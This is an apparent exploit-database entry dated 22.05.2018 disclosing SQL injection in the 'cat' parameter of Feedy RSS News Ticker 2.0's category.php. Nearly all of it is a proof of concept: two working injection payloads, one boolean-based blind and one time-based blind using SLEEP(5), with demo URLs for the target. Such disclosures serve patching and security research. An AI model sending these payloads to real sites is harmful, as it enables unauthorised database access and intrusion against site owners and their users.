# Exploit Title: Feedy - RSS News Ticker - 'cat' SQL Injection
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/feedy-rss-news-ticker/5818277
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux
====================================================

# PoC : SQLi :

Parameter : cat

     Type : boolean-based blind
     Demo : http://target/feedy/category.php?cat=
   Payload: cat=akkus+keyney' AND 2367=2367 AND 'NKyC'='NKyC
 
     Type : AND/OR time-based blind
     Demo : http://target/feedy/category.php?cat=1
  Payload : cat=akkus+keyney' AND SLEEP(5) AND 'AEHg'='AEHg

====================================================